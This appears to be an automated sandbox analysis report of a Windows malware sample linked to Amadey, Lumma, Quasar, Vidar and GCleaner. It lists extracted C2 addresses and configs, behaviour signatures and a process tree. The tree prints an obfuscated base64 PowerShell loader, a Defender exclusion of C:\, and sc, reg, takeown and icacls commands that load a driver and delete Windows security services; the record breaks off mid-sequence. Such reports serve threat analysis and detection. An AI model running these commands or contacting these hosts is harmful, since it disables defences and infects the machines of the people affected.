Analysis

  • max time kernel
    75s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/04/2025, 06:37

General

  • Target

    c19e763bd975bce9126d430b791daafb.exe

  • Size

    1.8MB

  • MD5

    c19e763bd975bce9126d430b791daafb

  • SHA1

    da1675700c0f3c5e58f7ba0377a505634730e653

  • SHA256

    679cd77725c32a0d630aa1599d683720d738c24148ebfb04b9509f561862906e

  • SHA512

    662822b1472e814849cff1da77ba27d7f78d2ec0615a12ba04140238bbee00ba7c2b54aa502c345e17630cf8de1d2f1fdb48316f65bfd7a3a83ce1904f91ad5c

  • SSDEEP

    49152:dZZm4fHinhF0I5XpeSVVIDbFL9mploGbqqXdol:dZ44KhTlYSVVQh9mpfbqq2

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://ironloxp.live/aksdd

https://metalsyo.digital/opsa

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

https://3starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://hywnnavstarx.shop/FoaJSi

https://cosmosyf.top/GOsznj

https://1targett.top/dsANGt

https://rlxspoty.run/nogoaz

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 30 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 14 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c19e763bd975bce9126d430b791daafb.exe
    "C:\Users\Admin\AppData\Local\Temp\c19e763bd975bce9126d430b791daafb.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe
        "C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:5876
      • C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe
        "C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1372
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:5476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4576
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:380
      • C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe
        "C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:5568
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
              PID:2784
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1432
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1360
                5⤵
                • Program crash
                PID:4296
          • C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe
            "C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3520
            • C:\Users\Admin\AppData\Local\Temp\261.exe
              "C:\Users\Admin\AppData\Local\Temp\261.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3152
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C90D.tmp\C90E.tmp\C91E.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4744
                • C:\Users\Admin\AppData\Local\Temp\261.exe
                  "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:396
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CA16.tmp\CA17.tmp\CA18.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                    7⤵
                    • Drops file in Program Files directory
                    PID:4904
                    • C:\Windows\system32\sc.exe
                      sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                      8⤵
                      • Launches sc.exe
                      PID:3336
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      8⤵
                      • Launches sc.exe
                      PID:4496
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      8⤵
                      • Delays execution with timeout.exe
                      PID:4520
                    • C:\Windows\system32\sc.exe
                      sc stop ddrver
                      8⤵
                      • Launches sc.exe
                      PID:5388
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      8⤵
                      • Launches sc.exe
                      PID:5604
                    • C:\Windows\system32\takeown.exe
                      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                      8⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:4424
                    • C:\Windows\system32\icacls.exe
                      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                      8⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:5100
                    • C:\Windows\system32\sc.exe
                      sc stop "WinDefend"
                      8⤵
                      • Launches sc.exe
                      PID:5512
                    • C:\Windows\system32\sc.exe
                      sc delete "WinDefend"
                      8⤵
                      • Launches sc.exe
                      PID:3180
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                      8⤵
                        PID:4052
                      • C:\Windows\system32\sc.exe
                        sc stop "MDCoreSvc"
                        8⤵
                        • Launches sc.exe
                        PID:3148
                      • C:\Windows\system32\sc.exe
                        sc delete "MDCoreSvc"
                        8⤵
                        • Launches sc.exe
                        PID:3560
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                        8⤵
                          PID:5260
                        • C:\Windows\system32\sc.exe
                          sc stop "WdNisSvc"
                          8⤵
                          • Launches sc.exe
                          PID:4612
                        • C:\Windows\system32\sc.exe
                          sc delete "WdNisSvc"
                          8⤵
                          • Launches sc.exe
                          PID:2956
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                          8⤵
                            PID:4452
                          • C:\Windows\system32\sc.exe
                            sc stop "Sense"
                            8⤵
                            • Launches sc.exe
                            PID:4428
                          • C:\Windows\system32\sc.exe
                            sc delete "Sense"
                            8⤵
                            • Launches sc.exe
                            PID:2216
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                            8⤵
                              PID:4812
                            • C:\Windows\system32\sc.exe
                              sc stop "wscsvc"
                              8⤵
                              • Launches sc.exe
                              PID:4956
                            • C:\Windows\system32\sc.exe
                              sc delete "wscsvc"
                              8⤵
                              • Launches sc.exe
                              PID:3656
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                              8⤵
                              • Modifies security service
                              PID:3784
                            • C:\Windows\system32\sc.exe
                              sc stop "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:5876
                            • C:\Windows\system32\sc.exe
                              sc delete "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:3256
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                              8⤵
                                PID:5572
                              • C:\Windows\system32\sc.exe
                                sc stop "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:1728
                              • C:\Windows\system32\sc.exe
                                sc delete "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:3208
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                8⤵
                                  PID:6012
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5676
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:896
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                  8⤵
                                    PID:4976
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5000
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5480
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                    8⤵
                                      PID:4984
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2772
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1844
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                      8⤵
                                        PID:2184
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:4384
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:5400
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                        8⤵
                                          PID:6024
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1372
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1656
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                          8⤵
                                            PID:5288
                                          • C:\Windows\system32\sc.exe
                                            sc stop "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2240
                                          • C:\Windows\system32\sc.exe
                                            sc delete "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
